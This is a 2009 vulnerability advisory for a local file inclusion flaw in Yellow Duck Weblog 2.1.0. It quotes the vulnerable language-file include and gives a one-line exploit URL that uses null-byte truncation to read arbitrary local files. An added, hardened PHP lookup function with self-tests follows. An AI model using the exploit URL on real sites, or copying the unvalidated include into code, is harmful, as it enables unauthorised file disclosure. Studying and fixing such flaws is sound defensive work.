# Title : Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion Vulnerability
# Published : 2009-04-13
# Author : ahmadbady
=-=-local file include-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::Yellow Duck Weblog
-------------------------------------------------
Author: ahmadbady
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://prdownload.berlios.de/ydframework/YDWeblog-2.1.0-final.tar.gz
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /include/languages/check.php
$file = 'language_' . $_GET['lang'] . '.php';   // line 9
include $file;                                  // line 20
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-
xpl:
/path/include/languages/check.php?lang=[local file]%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-
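A hardened form of the lookup quoted under "vul:", shown as an added example that is not part of the original advisory or of Yellow Duck Weblog. The function name resolve_language_file, the language-code pattern and the demo directory are assumptions made for illustration.

```php
<?php
// Added example, not Yellow Duck Weblog code. Hardened variant of the
// 'language_' . $_GET['lang'] . '.php' lookup quoted in the advisory.

/**
 * Resolve a requested language code to a file inside $langDir.
 * Returns the absolute path, or null if the request is not acceptable.
 */
function resolve_language_file($lang, $langDir)
{
    // Only plain strings; ?lang[]=x would arrive as an array.
    if (!is_string($lang)) {
        return null;
    }
    // Strict format: 2-3 letters, optional region (assumed naming scheme).
    // This rejects '/', '\', '.', and NUL bytes in one step.
    if (!preg_match('/\A[a-z]{2,3}(?:_[A-Za-z]{2})?\z/', $lang)) {
        return null;
    }
    $base = realpath($langDir);
    if ($base === false) {
        return null;
    }
    // Defense in depth: the resolved path must stay under $langDir.
    $path = realpath($base . DIRECTORY_SEPARATOR . 'language_' . $lang . '.php');
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Self-check with constructed inputs, run from the CLI only.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ydw_lang_demo';
    @mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'language_en.php', "<?php\n");
    // Constructed cases: valid, unknown, path separators, NUL byte, array.
    $cases = array('en', 'xx', '../outside/file', "en\0", array('en'));
    foreach ($cases as $c) {
        $r = resolve_language_file($c, $dir);
        echo json_encode($c), ' => ', ($r === null ? 'rejected' : basename($r)), "\n";
    }
}
```

PHP 5.3.4 and later reject NUL bytes in paths passed to include, which removes the %00 truncation but not the unvalidated concatenation itself, so the input check is still required.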